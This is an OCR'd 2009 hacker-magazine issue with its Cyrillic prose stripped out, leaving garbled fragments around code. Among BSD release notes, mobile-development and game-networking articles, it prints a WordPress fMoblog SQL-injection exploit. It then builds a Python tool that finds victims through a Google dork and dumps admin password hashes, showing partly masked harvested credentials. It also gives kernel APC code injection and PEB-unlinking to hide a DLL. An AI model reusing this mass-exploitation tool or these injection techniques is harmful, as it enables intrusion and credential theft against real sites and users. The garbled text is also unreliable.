pass in on $ext_if inet proto icmp to ($ext_if)
keep state (pflow)
host1# pfctl -f/etc/pf. conf
host2# ping host1
host1# pfctl -vss | grep -B1 pflow | head
all icmp 77.41. XX. YY: 1 <- 212.34. XX. YY:
45333 0:0
age 00:00:02, expires in 00:00:09, 2:0 pkts,
168:0 bytes, rule 14, pflow
pfsync (4) ,
. gcc gdb PIE
(Position Independent Executables),
, ,
. fstat (1), pstat (8)
sysctl -
INFO
info

OpenBSD
:
1 1 .
OpenBSD

.

OpenBSD:
http://openports.se.
DVD
dvd

OpenBSD 4.5
NetBSD 5.0.
085
>> unixoid
OPENBSD 4.5
OPENBSD 4.5
NETBSD 5.0

,
(root - ). OpenBSD
HMAC-MD5, HMACSHA1, HMAC-SHA256, AES-128-CMAC AES
Key Wrap,
( / usr / src / sys / crypto).
resolv.conf
nameserver,
nameserver 17.16.67.143:5353
,
5353 53-.

aucat.
,

. -,
jack
PulseAudio.
aucat ,
65 (default), (max): $ aucat -l -v 65-s
default -v 127-s max. ftp (
),
, ,
, '-n'
.

.
DH0_DHCP_OPTIONS_OVERLOAD dhcpd (8)
086

BGP, .
OpenSSL named (8).
ACPI Asus
eeePC 1000H ACPI BIOS.
NETBSD.

NetBSD BSD, 1993 4.3BSD Net / 2,
4.4BSD-Lite 4.4BSD-Lite2,
.
NetBSD , NetBSD
(Of course it runs NetBSD).
60 ,
.
, pkgsrc,

POSIX- -
.
? ,
, NetBSD.
NETBSD 5.0
OpenBSD 4.5 , ,
NetBSD 5.0 .
4.0
. BSD
, ( ) .
. FFS
;
1:1 ;
; malloc jemalloc; Xen
3.3; ,

PMF; ACPI
suspend / resume, rump
puffs .
.
.
WAPBL (Write Ahead Physical Block
Logging) Wasabi
Systems, 2003-
(
NetBSD ).

.
,
- ( log / etc / fstab)
, soft-dependencies (softupdates, FreeBSD).

EFS ( Silicon Graphics) HFS+
( Apple).
newfs_ext2fs (8) X 05 /125/ 09
NETBSD
>> unixoid
NETBSD ...
ext2, ,
, 32-
uid / gid. msdosfs,
16 .
mount_sysctlfs (8),

sysctl . UDF,

: mmcformat (8) newfs_udf (8).
unionfs FreeBSD, NQNFS
. rump (Runnable Userspace
Meta Programs),
. Rump
NetBSD , , ,
.
,
.
,
.
rump NetBSD rump_nfs
(8), NFS
. ,

.
puffs
(Pass-to-Userspace Framework File System)
, rump
-

NETBSD 5.0
ipf 4.1.29
BIND 9.5.0-P2
NTP 4.2.4p6
OpenLDAP 2.4.11
OpenPAM 20071221
OpenSSH 5.0
OpenSSL 20080509
Postfix 2.5.4
GNU GCC 4.1 20080831
X 05 /125/ 09
...

.
,
:
mount_psshfs (8)
sftp-;
mount_puffsportal (8)
portalfs ;
mount_9p (8) 9P (,
Plan9 Inferno).
puffs FUSE (File system in USErspace,
fuse.sf.net).
sftp- mount_psshfs:
mount_psshfs -O Compression=yes
vasya@host.com: / usr / mnt

,
newlock2 vmlocking2, -
087
>> unixoid
.
libpthread,

. SA 1:1. malloc
jemalloc FreeBSD,
.
SCHED_M2,

,
,
. NetBSD
MP.
Linux (compat_linux (8)
compat_linux32). FreeBSD
TLS,
getdgid, old_uname, readdir, pread,
pwrite, mlock, munlock, msync, sys_clock
{getres, gettime, settime} chown.
IPC, ossaudio
(3). procfs
/proc/stat, /proc/loadavg
/proc/<pid>/statm.
32- NetBSD (compat_netbsd32
(8)), HP-UX
(compat_hpux). ,

,
@ruid,
UID .

/tmp ( per_user_tmp=yes /etc/rc.conf).
,
,
, , ( x86 ~/bin
~/bin-i386):
# sysctl vfs.generic.magiclinks=1
$ ln -s / home / vasya / bin-@
machine / home / vasya / bin
bluetooth . Bluetooth
HCI UART, Linux BlueZ
. btuartd (8),
, bpand (8),
PAN (Bluetooth Personal Area
Networking) btkey (1) . ifconfig (8)
list scan
.

Microsoft Xbox,
DRM (Direct Rendering Manager),
2D- 3D-
, PIE. Xen
088
3.3,
amd64 (dom0 domU) i386 PAE domU.
systrace.
POSIX

: POSIX Real-time, Asynchronous I/O POSIX
message queues. fast_ipsec (4)
IPSec NAT-T,
pf (4) OpenBSD
4.2. ipv6 fast forward.
boot.cfg
(8), :
menu=Boot normally: boot netbsd
menu=Boot single user: boot netbsd -s
menu=Disable ACPI: boot netbsd 2
menu=Disable ACPI and SMP: boot
netbsd 12
menu=Drop to boot prompt: prompt
default=1
timeout=5
dkscan_bsdlabel
BSD disklabel .
:
amd
(amd maps) LDAP.
config LINT (
'-L').
newsyslog bzip2,
'J' / etc / newsyslog. conf.
bioctl
/
hot-spare, pass-through
RAID-, /
.
patch DragonFly.
sdiff OpenBSD.
xargs FreeBSD.
NetBSD :
audit-packages
download-vulnerability-list

.
acpitools, FreeBSD.
c99 , cc C99.
tprof , .
schedctl ,
.
psrset
.
cpuctl / .
httpd
HTTP-, ,
dhcpcd 4.0.11.

, BSD.

.
OpenBSD NetBSD
,
,
IT.
,
. z
OpenBSD 4.5

i386/amd64 :
Gnome 2.24.3
KDE 3.5.10
Xfce 4.4.3
OpenOffice.org 2.4.2 3.0.1
OpenArena 0.8.1
Mozilla Firefox 3.0.6
Mozilla Thunderbird 2.0.0.19
MySQL 5.0.77
PostgreSQL 8.3.6
X 05 /125/ 09
++++
>> coding
++++
++++
++++

/ AZANITO@GMAIL.COM /
++++
++++
++++
++++
++++
++++

?

,
, .
Symbian, iPhone, BlackBerry, Windows Mobile, Android
.
.
R&D?
++++
++++
++++++++++++++++++++++++++++++++
APPLE IPHONE
:
++++
: Objective C, C++
: 15 .
: 16%
: 2
++++
SDK

++ ++
++++
++++
++++
++++

SDK
Apple Mac OS X IDE
$5
. , SDK,
( z).
iPhone , , AppStore,
. $0.99 $4.99.
- ,
12 . iFart (
). ,
top100 , , top20,
090
. :
2030 , 12
( -
). , - .
80% AppStore.
, ,
, , , , . ,
, .
, , Symbian ,
iPhone .
.
, ,
.
++,
. . ,
. : SDK (
Symbian), ,
. (, ) .
.
,
. , - ,
, ,
. ?
X 05 /125/ 09
>> coding
++++++++++++++++++++++++++++++++
JAVA ME
: Java ME
:
2008
: 80%

iPhone, Palm OS Windows

Mobile

, , ,
$6080 (iPhone ,
).
Java ME
: -
, . Java-
HTML ,
, ,
.
X 05 /125/ 09
, : Java
Nokia, BlackBerry,
-, - ,
. .
.

, , ,
. ,
()
. ,
, , .
Java- ,

Java-.
, Java-
GetJar.com,
, , ( iPhone, ).
Java-. Java ME , ( ), SMS,
.
.
.
091
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++++++++++++++++++++++++++++++
SYMBIAN
: Symbian C++,
C, C++
: 226 . ( )
: 44%
: 159
. (
) ,
HTC - .
Android,
.
++++++++++++++++++++++++++++++++
WINDOWS MOBILE

. 15
, , , . ,
C,
, , .
Nokia
Qt, P.O.S.I.X, STL Boost,
API C++ (IOStreams ). ,
Symbian- , C#, Ruby, Python.
,

Symbian-. , , ,
. Nokia ,
, , .
S60 Download!,
-
. GetJar, Handango Nokia ,
User Experience, .
,
Symbian . . Symbian SDK

. $5, ,
, $25, $5070 ( ).
Symbian-
, . !
++++++++++++++++++++++++++++++++
ANDROID
: Java
: 1
: 1%
: 1

++++
++++
++++
Android, .
Google ,

, .
,
, Android-, , .

Samsung
092
: C++, # .Net
: 50 . , 20 .
: 13%
: 30

,
,
, , Web . AMOLED- WinMo 65 535
. 6.5
,
.

. ,
WinMo, .
. Microsoft
. - Windows
Mobile VGA- Wi-Fi. Windows- 800480, c
.
,
, iPhone.
WinMo ,
.
Windows Mobile . .
HTC -
?
++++++++++++++++++++++++++++++++
,
, , , .
. X 05 /125/ 09
>> coding
,
SCIENCESOFT
, : Symbian, J2ME,
WinMo, iPhone, Android Linux,
.
: ,
,
() , , ,
.
++++++++++++++++++++++++++++++++
CACTUSSOFT
,
CACTUSSOFT
. ,
. .
!
: , , VoIP, Java,
.NET, WEB-.
: iPhone, Android, Windows Mobile, BlackBerry,
Symbian, J2ME. : cactussoft.biz.
:
iPhone. ,
iPhone .
iPhone success stories .
GETJAR
SCIENCESOFT : , ,
, , , .
: Windows Mobile, Symbian, J2ME, Brew,
Android.
: scnsoft.com
scnsoft.com..
: , , ,
, .
.
. ,
,
.
: . X 05 /125/ 09
093
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
: iPhone, Symbian BlackBerry,

, . ( ,
2010 ) Google Android.
:
, iPhone Android, , .
Android (-
, ).
++++++++++++++++++++++++++++++++
GETJAR :
.
: Java, Symbian, Windows Mobile, BlackBerry, Palm, Flash Lite.
: getjar.com.
: , ,
Java. , :
stats.getjar.com.
Java. , Java-
. , 35
Symbian iPhone ( ). Nokia Symbian, , , Symbian
. iPhone , .
ANDROID: Android Linux-.
, .
: GetJar
, - . ,
.
Java, Symbian, BlackBerry, Windows Mobile Android.
++++++++++++++++++++++++++++++++
++++
++++
++++
++++
. ,
, ,
, Carbide.
SDK all-in-one: Symbian C++, Open C/C++, Java, WRT ( )
Python. IDE Carbide.c++ 2.
, , 2008 .
Carbide.c++ Symbian
C++, C/C++ Qt.
: SDK .
, Symbian . .
:
Forum Nokia. , .
devmobile.ru.
ANDROID: Android . Google
WOW- Apple, . , Android
: Symbian OS ( S60 UIQ), Windows Mobile.

: Accredited Symbian Developer, Forum Nokia Champion.
: Symbian OS, S60.
: iPhone
: Symbian C++ S60 , J2ME,
- .
C++, . Windows , .
, ,
094
, . Android
. ,
J2ME. Java , Android-
, . ,

.
IPHONE: iPhone
. Apple
, , -
. iPhone
.
, ,
.
: Symbian
. AppStore Samsung, Nokia Ovi Store

.
X 05 /125/ 09
>> coding
++++++++++++++++++++++++++++++++
: J2ME, Windows
Mobile 2003/2005/6.0, Android.
: Senior Developer.
: J2ME (MIDP 2.0+), Windows Mobile.
: Symbian.
ANDROID: Google Android , Java.
/ , ? ,
, ,
:). Google SDK, . ,
,
. Google
, API Android
.
:
. 4 . -
GOOGLE
SDK,

. , ,

.
. code.google.
com/android/groups.html.
: , , J2ME (MIDP
2.0+). , .
,
API.
Windows Mobile. , .
J2ME WM IDE (Eclipse Visual Studio) . how to. , ,
.
, . WinMo
WinAPI. Symbian .
, .
: Android Market ,
, - . Augment Reality
Android. , . , -
.
++++++++++++++++++++++++++++++++
: J2ME, Sony-Ericsson UIQ,
Motorola, BlackBerry OS LG Samsung.
: Sun Certified Mobile Application Developer.
: Sony Ericsson 4ever!
: S40, S60 .
JAVA ME: Java Community Process Sun Java ME, -
X 05 /125/ 09
,
API. . API
Instant Messaging, SIP- VoIP,
UI- .
, .
JavaFX Mobile, . , .
: Java ME
Java. finalization, JNI ,
Java, . , ME,
javax.microedition.
, Java SE, , ,
.
, !
:
(, progressive download, Bluetooth- ( 1)
), , . ,
.
: , JTWI-
(Java Technology For Wireless Industry), .
,
.
debuge.
: ,
. , , . Nokia, Sony
Ericsson, Motorola. , , guide-lines,
, ,
, .
ANDROID: ScienceSoft (www.
sciencesoft.com) , , Java: J2ME, Blackberry (
Sun), Android. java-
Android. j2me- API
Java, Sun. J2ME-
: ,
... . z
095
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
SPIRIT
/ HTTP://TUTAMC.COM /

-
Python
, , . ?
!
. ,
, Python,
.
, RSS-,
- http://milw0rm.com.

.
-,
milw0rm,
- . ,
,
.

:
,
;

.
!

. , milw0rm
WordPress http://
milw0rm.com/exploits/8229,
fMoblog:
Wordpress Plugin fMoblog Remote SQL
Injection Vulnerability
Author: strange kevin
Dork: "Gallery powered by fMoblog"
Exploit: http://www.site.
com/?page_id=[valid_id]&id=99+union+all+select+1,2,3,4,group_
096
concat(user_login,0x3a,user_
pass,0x3a,user_email),6+from+wp_
users--

.
dork
,
.
, ,
,
. URL ,
:
inurl:page_id+"Gallery+powered
+by+fMoblog"

:
http://www.google.com/
search?q=dork&start=0

,
URL .
, :
,
r. ,
:
class=r><a href="([^&]*)
,
,
&. :
...<h3 class=r><a href="http://
saturdaybang.org/?page_
id=12&id=16"...
:
http://saturdaybang.org/?page_id=12,
.
, (google.py), (, google.txt).
, , ,
. ,
curl,
curl.py.
pycurl. Curl.py ,
pycurl
Get-. url_get
URL ,
, ,
. :
curl.py
#
import pycurl
import StringIO
# URL
def url_get(url):
#
data = StringIO.StringIO()
X 05 / 125 / 09
>> coding
, , , :
curl = pycurl.Curl()
# pycurl
curl.setopt(
pycurl.FOLLOWLOCATION, 0)
curl.setopt(
pycurl.CONNECTTIMEOUT, 30)
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.WRITEFUNCTION,
data.write)
try:
#
curl.perform()
except:
pass
curl.close()
#
return data.getvalue()
google.py
google.txt
,

.

,
, ,

. , .
() , ,

.
autotester.py,
wp.py.
WP.PY
wp.py . max_count_thead
,
X 05 / 125 / 09
file_google = google.txt
file_success = success.txt
file_failed = failed.txt
max_count_thead = 20
file_google
. file_success , file_failed .
. , .
,
.
,
,
.
,
, success
failed. :
from __main__ import success,failed
__main__ ,
. ,
,
, :
failed('site')
.
. run
url :
rez = re.findall('::(.*)::',rez)
if (len(rez)==0):
failed(url)
else:
success(url + ':' + rez[0])
print '# ' + url + ' tested'
,
SQL-.
.
(0x3a)

.

, ,
failed.txt.
.
.

. (
).
thread import thread,
thread.start_new_thread.

pass ( Python
):
def some_function():
pass
:
import curl
import re
def run(url):
new_url = url + '&id=999+union+all+select+1,2,3,4,
group_concat( 0x3a,0x3a,user_
login,0x3a,user_pass,0x3a,0x3a),
6+from+wp_users--'
rez = curl.url_get(new_url)
thread.start_new_thread(
some_function,())
,
:
for i in xrange(0,10):
some_function,())
097
++++
>> coding
++++
++++
,
,
PYTHON
++++
++++
++++
PYTHON

++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
NETBEANS . ECLIPSE

,
thread. , !

,
.
count_thread 0,
,
.
1:
for i in xrange(0,sys.argv[3]):
count_thread += 1
some_function,())
, ,
,
,
:
def some_function():
global count_thread
count_thread -= 1

, :
while (count_thead0):
pass
++++
098

.

:
file_test_site = 'wp'
import file_test_
site, .
:
test_site = __import__(
file_test_site)
,
wp.py
test_site .
,
, wp.py, :
print test_site.max_count_thead

,
wp.py:
fi = open(
test_site.file_google,'r')
site_list = fi.readlines()
site_list = uniq(site_list)
f_success = open(
test_site.file_success,'w')
f_failed = open(
test_site.file_failed,'w')
, uniq.

(
). :
def uniq(inlist):
#
rez = []
#
for item in inlist:
#
if item not in rez:

#
rez.append(item)
return rez

. ,
:
def success(text):
global f_success
f_success.write(text + "\n")
f_success.flush()
flush,

.
X 05 / 125 / 09
>> coding
, site_list URL pop:
site = site_list.pop()
, ,
.

run_test . , , run google.py:
def run_test(site):
global count_thead
test_site.run(site)
count_thead -= 1
:
#
while ( len(site_list)"0 ):
#
if (test_site.max_count_thead > count_thead):
#
site = site_list.pop()

#
dork = 'inurl:page_id+"Gallery+powered+by+fM
oblog"'
page = 10
reg = 'class=ra href="([^"&]*)'
print "# start"
print "# dork:" + dork
print "# all page: " + str(page)
#
fo = open('google.txt','w')
print "# google.txt open"
import curl
import time
import re
# page
for i in xrange(0,page):
# URL
url = "http://www.google.com/
search?q="+dork+"&start=" + str(i*10)
#
rez = curl.url_get(url)
#
rez = re.findall(reg,rez)
#
for item in rez:
fo.write(item+"\n")
print "# page "+str(i+1)+" done"
# 2 .
time.sleep(2)
#
fo.close
print '# all done'
X 05 / 125 / 09
count_thead +=1
#
thread.start_new_thread(run_test,(site,))
# ,
# , -
else:
pass
HTTP://WWW
links

,
, max_count_thead, wp.py. ,
.

, , .
, , , url_get,
-.
, ,
, , , -. ( ), ,
.
, . - ,
,
.
, .
, ,
.
,
.
google.py autotester.py,
success.txt,
.
:
http://kota***an.com/wp/:lug:$P$B16Yr5TQFQ2t
jrmMxUHiZubzzqZJ2A.
http://info***e.com/:admin:$P$B58JineUw6OJoE
DL9hD9me5XaumzOt0
http://www.tar***up.com/:admin:$P$BRH1fDlLrq
hpAOLOo38w5Xlke/AH70.
:
http://milw0rm.com.
,
:
http://milw0rm.com/
exploits/8229.

NetBeans,
:
http://netbeans.org.
DVD
dvd
,
,

.
WARNING
warning

.
!
,
.
PasswordsPro (http://www.
insidepro.com/download/passwordspro.zip).
.
,
.
, , SQL injection, , run
wp.py, .
XSS,
, . ,
, !
,
, z
, , .
! z
099
++++
>> coding
++++
YUREMBO
/ YAZEVSOFT@GMAIL.COM /
++++
++++
++++
++++
++++
++++
++++
++++
++++
. . ,

, DirectX (
-, 3D-, ,
.). . , .
++++

++++
++++
++ ++
++++
++++
++++
++++
Dark GDK,
.
:
,
- . ,
( , ,
4 ,
), .
, , :
, ,
, .
,

DirectPlay,
Dark GDK ( , , DirectX) . ,

DirectPlay.
MultiSync
( http://forum.thegamecreators.com).
, ,
100
DarkGDK, .
, MikeNet.
-,
. MikeNet
-
: , .
,
.

: TCP UDP;
, ,

. .
, MikeNet
.
MIKENET
MikeNet
The Game Creators (http://
forum.thegamecreators.com).
1.0.6,
-, , yurembo
. ,

, , ,
,
(
).

.
,
MikeInstall. exe ( ,
++:)).
DOS-
( . 1).
, VS ,
,
MikeNet.
.
MikeNet. lib
VC \ lib , , mikenet. h VC \ include.
, (
,
MikeNet)
(, Project DarkRobot Properties).
X 05 / 125 / 09
>> coding
4:
: Configuration Properties Linker,

Input.
,
(Additional Dependencies),
: MikeNet. lib WS2_32.lib (.
2).
: , C / C++, Code
Generation, ,
Runtime Library, Multi-threaded ( / MT) (. 3). ,
,
.
!
.
, ,
.
-.
,

.
. ,
. -, ()
. -,
. ,
.
, .

, ( )

( !).
-, ( ,
). , -,
( ).
X 05 / 125 / 09
,
. VC++
. Dark GDK
Game. ,
MikeNet,
: <MikeNet. h>.

( DarkServer,
DarkRobot),
. yurembo

.

,
, ,
: ,
.
, . ,
, ( ).
mnSetLocal .
ip- tcp-.
( ), , ip- , . ,
tcp-.
, , ,
tcp udp. , , MikeNet
( MN ). ,
mnSetLocal
, 0 1.

.
,
mnStartServer : ,
,
udp-,
udp-.
udp-. :
UDPMODE_PER_CLIENT UDPMODE_PER_
CLIENT_PER_OPERATION.
, , ,
.

( ), . ,

( ), , .
,
.
,
,
. 0, MikeNet

.

, !
0.

,
,
. , ,
.

. ,
. , , , .
mnClientJoined .
, ,
, : id,
tcp ip, tcp port, udp ip, udp port.
, .
mnClientConnected ,
, id -
101
++++
>> coding
++++
++++
++++
++++
++++
IP
++++
++++
++++
++++
++++
++++
++++
++++
, .
mnRecvUDP, : 1 id
, , 2 . 1 ( ), 0 1 . ,

, .
, ( ).
mnGet* ( * ).
- ( ), mnAdd* ( * ) .

. , mnSendUDPAll . :
1 ;
2 ,
;
3 ,
( , ).
, deadcount .
, , , ,
udp- (2- ).
,
( )
(, )
. ,
Free for All .
++ ++
++++
++++
++++
++++

. ,
. . mnClientLeft , -
, 0, ,
( ) .
.
, udp-
( ). -
102
, . ,
, . yurembo ( ).

.
:
,
( ,
). ,
, .
DARKROBOT MULTIPLAYER GAME

,
. ,
, .
X 05 / 125 / 09
>> coding
MIKENET

: Main.
cpp, Robot. cpp, Robot. h, Game_Obj. h (
). Main. cpp. gamemod,
: 0 (
), 1 , 2 .
,
, (,
),
. , ,

. tcp udp (
)
.
. ?
yurembo (
, ,
). ,
(
, ). ( )
.
SelectGameType.
gamemod, .
, ,
.
X 05 / 125 / 09
dbScanCode,
. ,
. ,
,
! , , ,
,
.
GetUserName.
. ,
, ip-
.
makeConnect,
ip mnConnect
. mnConnect
: ip- , tcp; tcp
; ip- ,
udp; udp ;
( ) ; (
mnStartServer ). 1, 0
1 . , makeConnect
. , tcp- udp ip- ,
MikeNet ,
ip-
. .
, , .

() :
.
, .
,
- . : , ( ),
, . ,
cnumber, . ,
HTTP://WWW
links
www.thegamecreators.
com -
Dark GDK.
DVD
dvd

DarkRobot,
: Visual C++
2008 Express Edition,
DirectX 9.0 SDK, Dark
GDK, MikeNet.
INFO
info

, ,

.
103
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
,
, .
: SetNumber
GetNumber
cnumber, SetLifeCount GetLifeCount

. GetWinCount , ZeroWinCount
. :
SetMultiplayerMode GetMultiplayerMode,
, ( - ). Robot. cpp,

: - .
,
( mnFinish,
). ,
-
Die .
,
, ,
, 1 .
, ,
, .
104
Main. cpp. ,
, ,
.
, ( ) (
)
-.
,

, .

,
( ).

,
tcp, ,
.
mnRecvTCP tcp-.
,
,
NULL.
, 0,
, 0 (=
, ).
,
. :
. , : tcp-
( ). ,
.

. ,

(cnumber, GetNumber),
, .
, ,
.
tcp udp. UDP : () (PositionClient),
, (Win). :
, ,
.

: Dark GDK.
, .
X 05 / 125 / 09
>> coding
,
PositionClient, , , Win.
udp ,
, - . ,
. ,
! , , ,
win-, ,

.
,
.
. ,
NetGameOver, ,
,
.

udp-. ( ).

:
, -, ( ) ?
, ,
- ?
:
. , . . ,
. .
, ,
,
( ).
, , ,
z ,
( ,
, , 3).
,
, .
.
.
, .
X 05 / 125 / 09
, - , .
, ,
. ,
,
.
, -, ! ,
Escape , ,
. , ()
, , .
, ,
Game_Obj. h. Die.
, ,
,
.
, , DarkRobot.
, ,
, ,
,
! ,
. : ,
-
, ,
, : ,
,
!

(middleware), ,
, Dark GDK. , : - ,
DirectX!. , yurembo ,
,
DirectDraw, . ,
3D- ,
. , ,
( ), ( , ) ,
: !
- ( , ), , yurembo
. , ! z
105
++++
>> coding
++++
++++
EPROCESS
EPROCESS
EPROCESS
KPROCESS
KPROCESS
KPROCESS
LIST_ENTRY {
LIST_ENTRY {
LIST_ENTRY {
FLINK
FLINK
FLINK
BLINK )
BLINK )
BLINK )
++++
++++
++++
++++
++++
++++

/ ALEKSANDR-EHKKERT@RAMBLER.RU /
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++

Windows ( ) .
,
. -
, , , ,
Native API... , Windows.
WINDOWS
Windows

. . ,
Windows.
106
:
, , ,
,
, ..;

,
(4 GB, );
,
.
- , Win32
X 05 /125/ 09
>> coding
PE-TOOLS DLL,
, CreateProcess,
CreateProcessAsUser ( Win NT/2000)
CreateProcessWithLogonW ( Win2000) ..
.
, -
APC

pMdl = IoAllocateMdl(pPayloadBuf,
dwBufSize, FALSE, FALSE, NULL);
MmProbeAndLockPages(pMdl, KernelMode,
IoWriteAccess);
KeStackAttachProcess(pTargetProcess,
&ApcState);
MappedAddress =
MmMapLockedPagesSpecifyCache(pMdl,
UserMode, MmCached, NULL, FALSE,
NormalPagePriority);
KeUnstackDetachProcess(&ApcState);
KeInitializeEvent(pEvent,
NotificationEvent, FALSE);
KeInitializeApc(pApc, pTargetThread,
OriginalApcEnvironment, &MyKernelRoutine,
NULL, MappedAddress, UserMode, (PVOID)NULL);
KeInsertQueueApc(pApc, pEvent, NULL, 0);
X 05 /125/ 09
,
!
.
. Windows, ,
, .
,
, ,
.

? !
,
( )
.
, .

. ?
! - NOD !

,
,
. ,
(,
.). , , 100%
,
, . . ?
www.wasm.ru.
User Mode

HTTP://WWW
links

(
):
What Goes On Inside
Windows 2000:
Solving the Mysteries
of the Loader (
MSDN), Three Ways
to Inject Your Code
into Another Process
(www.codeproject.
com/threads/winspy.
asp) Dll Injection
(www.codebreakersjournal.com/content/
view/127/97).
107
++++
++++
+++
++++
++++
++++
++++
++++
++++
++++
>> coding
EPROCESS
EPROCESS
EPROCESS
KPROCESS
KPROCESS
KPROCESS
ZwQuerySystemInformation(SystemProc
essesAndThreadsInformation , ...) ntdll.dll.
WARNING
.
, ,
LIST_ENTRY {
LIST_ENTRY
{
, , Windows. warning
, .
Windows
. ,
FLINK
FLINK

.

Windows

EPROCESS. ,
BLINK
)
)
.
, BLINK

. ,
PdbDump, , ETHREAD. EPROCESS, ,
,
.
, LIST_ENTRY,
.
EPROCESS, ,
, , .
, Windows
,
, .
, ,
EPROCESS.
PsGetCurrentProcess():
PEPROCESS ePROC = PsGetCurrentProcess().
,
, . ZwQuer
ySystemInformation(SystemProcessesAndThreadsInformat
LIST_ENTRY {
ion, ...) (
PID ).
EPROCESS ... !
FLINK .

, , . ,
, .
BLINK )
DLL

exe- ( ),
dll,
- . , : ,
dll
.
,
VirtualAllocEx/WriteProcessMemory
CreateRemoteThread.
, ,
.
dll
,
+++
+++
+++
+++
+++
+++
+ ++
+++
+++
108
X 05 /125/ 09
>> coding
. , Windows
.
(Process Environment Block, PEB).
,
. , ,
PEB_LDR_DATA PROCESS_PARAMETERS.
PEB_LDR_DATA , . -
! PEB,
dll, : Peb
LoaderData InLoadOrderModuleList. ,
dll ,
,
InLoadOrderModuleList.
, PEB
Usermode:
PEB* GetPEB()
{
PEB* pPeb;
__asm {
push fs:[0x30]
pop pPeb
}
return pPeb;
}
ZwQueryInformationProcess
ProcessBasicInformation.
PROCESS_BASIC_
INFORMATION,
PEB. , PEB , , PEB
0x7FFDF000.
PEB :
. ,
.
, , , ,
, c
.
Windows APC
Asynchronous Procedure Call - , ,
. - .
callback- APC,
. , APC
Windows, (suspend/resume) . APC , APC

, ,
APC
. (, )
APC : http://www.cmkrnl.
com/arc-userapc.html.
, : MDL,
.
-,
.
APC,
-.
TargetThread,
.

PKTHREAD thread=KeGetCurrentThread().
, , - , ,
NtReadVitualMemory

NtWriteVirtualMemory. , - :
EPROCESS
PEPROCESS eProcess = PsGetCurrentProcess();

pPeb = (PVOID)(*(PULONG)((PCHAR)eProcess +
PebOffset)).
DVD
dvd

,
,

,

.
INFO
info

SoftICE WinDBG.

www.
microsoft.
com/whdc/
DevTools/Debugging/
symbolpkg.mspx.
EPROCESS
KPROCESS
KPROCESS
PEPROCESS process = PsGetCurrentProcess();
KeAttachProcess(process);
NtWriteVirtualMemory(process_handle,
address, buffer, numbytes, NULL);
. dll,
NtReadVirtualMemory.
}
, dll- KeDetachProcess();
. , PEB dll LIST_ENTRY
,
LIST_ENTRY
{ , . , , .
, writeable,
non-writeable BSOD.
dll, ,
,
- , FLINK
FLINK

. .
.
PEB,
ring0,
-
BLINK )
BLINK
)
?,
dll - user32.dll. .
.
, ,
,

. .
. , , ! z

X 05 /125/ 09
109
>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /
!!!
-
>> phreaking
! , , , .
. . , .
, .
.
, Quake3 Arena. ,
! , ,
. , , ( ).
, Wi-Fi.
. , ,
, ,
! .
,
. , , .

,
, , ,
. , ,
.
( ) , . : , , , , ,
VGA-, . ,
, ,
.
?
?. , . ,
. ,
,
.
(NVIDIA mx400). ,
VGA-. , , . .
110

, ? !,
-.
, , ,
, .
,
, , . , ,
.
, :
. ,
, . , , , . ,
,
- .
, .

, ,
. :

, ,
.
. , , CH1,
CH2. 1 5. , ,
, ,
2-. ,
, , .
X 05 /125/ 09
>> phreaking
,

-
AIMP

,
, .
. ,
.
, ,
,
. , ,
. , .
1V, 10 ,
-5 + 5 .
, , .
X 05 /125/ 09
111
>>
>> pc_zone
phreaking

.

, .

DVD
dvd

-
.
,

.
, .
Mathcad-,

. , ,
.
,
, , ,
. - , , ,
!
\time div,
.
.
,
. .
,
.
;
, ,

.
,
. 2-,
, ,
.
, .
,

. ,
3 ,
, 3 ,
3 .
,
,
,
.
-

, .
VGA- .
. .
,
, , .
, , , .
, .
(
, pnp npn ). . ,
112

, Z-.
- ,
( ) .
, ,
,
, . , ,
. ,
.
Z-
.
.
9- ,
. ,
,
. .
. - ,
, , ,
, .
Z- +9V.
, .

,

,
.
, ,
, , ,
.
, - . ,

.
, -
. , , .
, .
, ? ,
.

, ,
,
. , , .
3.5 , , -
mp3-, wav-.
X 05 /125/ 09
>> phreaking
,
,

,
, ,
,
- .
3,
.
,
.
, , , ,
.
Blender. ,
.
, , ,
, , , .
-
-.
, ,
.
.
, , , , . ,
,
,
.
, . , ,
, - . : http://www.
electronixandmore.com/project/index.html. z

, ipod
mp3- ,
, . ,
,
, . ,
X 05 /125/ 09
113
>> phreaking

/ DLINYJ.LIVEJOURNAL.COM /
UART
z UART,
, .

, . ?
>> phreaking
COM-
UART (Universal asynchronous receiver/transmitter) ,
-, ( )
.
UART RS-232 ( COM-,
). , , .
.
,
,
( ). . , ASCII,
. 60-
8- ,
, .
1971 , ,
PDP Western Digital UART
WD1402A. 80- National Semiconductor
8520. 90- ,
.
, ,

, UART-,

RS-232.
. , ,
. , ,
, .
114
RXD TXD, RX TX.

TXD (Transmitted Data), RXD (Received
Data) .
-
. (DTS, RTS .).
TX RX .
RS-232
5- TTL. +3 +12
, -3 -12, . -3 +3
. ,
, . , , ,
: -12 +12 . -.
, 24 ,
.
, , ,
15 .
25 .
RS-232 ,
UART.

UART .
10 . -. ,
, One-Wire
. , ,
, -12 . ,
. .
X 05 /125/ 09
>> phreaking
UART .
,
-
.
LINUX MINICOM

. . ,
. , STOP-
1, 1.5, 2 . , ,
. , , .
X 05 /125/ 09
-, ,
: 9600, 28800, 33600, 56000 ..
? , , 9600 .
, 1/9600 ,
11/9600.
, - . , -, 12/9600. ,
: ,
. - .
, : 9600,
19200, 115200. ,
, ,
.

UART .
, , ,
115
>>
>> pc_zone
phreaking

, ,
,
Segate.
, , .
UART.

. DVD.
-
DVD
dvd

,
-.
HTTP://WWW
links
dlinyj.livejournal.com
,
.
.
,
. :

,
. , ,
-
, , ,

.
. ! ,
.
.
RS-232
RS-485. ,
,

4 .
1 . ,
.
, IRDA, , , ,
, UART.
, .
SMART- (SIM, ,
) ,

UART. , , 1,8/3,3 5 .
, RX TX
, , ,
. -.
, ,
. . , , UART .

,
-? , RS-232 , ,
, 5- ? :
. ,
232.
: , .

UART. , ,
.

, MAXIM,
(max232).
116
